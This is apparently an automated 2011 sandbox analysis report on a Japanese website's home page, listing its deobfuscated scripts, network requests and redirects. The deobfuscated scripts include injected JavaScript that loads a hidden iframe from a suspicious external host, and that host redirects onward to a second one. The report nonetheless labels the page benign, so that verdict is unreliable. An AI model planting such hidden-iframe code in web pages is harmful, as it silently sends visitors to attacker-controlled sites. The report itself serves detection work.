Analysis report for http://www.ganbanyoku-tsubaki.jp/index.html
Sample Overview
| URL | http://www.ganbanyoku-tsubaki.jp/index.html |
|---|---|
| MD5 | 5f373b85a47fb95b5c0d1c2c4e778273 |
| Analysis Started | 2011-08-01 08:07:23 |
| Report Generated | 2011-08-01 08:07:59 |
| Jsand version | 1.3.2 |
See the report for domain www.ganbanyoku-tsubaki.jp.
Detection results
| Detector | Result |
|---|---|
| Jsand 1.3.2 | benign |
Exploits
No exploits were identified.
Deobfuscation results
Evals
if (document.getElementsByTagName('body')[0]){
iframer();
}
else {
document.write("<iframe src='http://pzjqdclj.cz.cc/count20.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src', 'http://pzjqdclj.cz.cc/count20.php');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
(repeated 1 time)
var goog$calendar$GdataRequest$callback
(repeated 2 times)
-
(repeated 2 times)
Writes
<script language="VBScript">
(repeated 1 time)
-
(repeated 1 time)
-
(repeated 1 time)
-
(repeated 1 time)
ax = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.6")))
(repeated 1 time)
-
(repeated 1 time)
<img src='http://www.ganbanyoku-tsubaki.jp/cgi-bin/ganbanyoku/log_note.cgi?page_name=00&
(repeated 1 time)
-
(repeated 1 time)
&amp;&amp;
http://www.ganbanyoku-tsubaki.jp/index.html
(repeated 1 time)
-
(repeated 1 time)
<font size="-1" color="red">Flashプラグインがないので、<br>再生出来ません。<br><a href="http://www.adobe.com/jp/downloads/" target="Flash">ダウンロード</a></font>
(repeated 1 time)
Network Activity
Requests
| URL | Status | Content Type |
|---|---|---|
| http://www.ganbanyoku-tsubaki.jp/index.html | 200 | text/html |
| http://www.ganbanyoku-tsubaki.jp/common.js | 200 | text/x-js |
| about:blank | 200 | text/html |
| http://pzjqdclj.cz.cc/count20.php | 302 | text/html |
| http://simoncudby.cu.cc/showthread.php?t=90140028 | 404 | application/x-empty |
| https://www.google.com/calendar/embed?showNav=0&showTabs=0&showCalendars=0&showTz=0&height=500&wkst=1&bgcolor=#ffccff&src=dcen3jh7fb2t1fs8fv3f0edsk8@group.calendar.google.com&color=#0D7813&src=p#weather@group.v.calendar.google.com&color=#2952A3&src=ja.japanese#holiday@group.v.calendar.google.com&color=#A32929&ctz=Asia/Tokyo | 200 | text/javascript |
| https://www.google.com/calendar/435ba7a4e2f1a410e67bcff4ba4f2bd7embedcompiled__en.js | 200 | text/javascript |
| https://www.google.com/calendar/435ba7a4e2f1a410e67bcff4ba4f2bd7embedcompiled_fastui.css | 200 | text/javascript |
| http://www.ganbanyoku-tsubaki.jp/undefined | 404 | text/xml |
Redirects
| From | To |
|---|---|
| http://pzjqdclj.cz.cc/count20.php | http://simoncudby.cu.cc/showthread.php?t=90140028 |
ActiveX controls
-
Microsoft.XMLHTTP | No attribute setting or method call detected |
Shellcode and Malware
No shellcode was identified.
No additional malware was retrieved.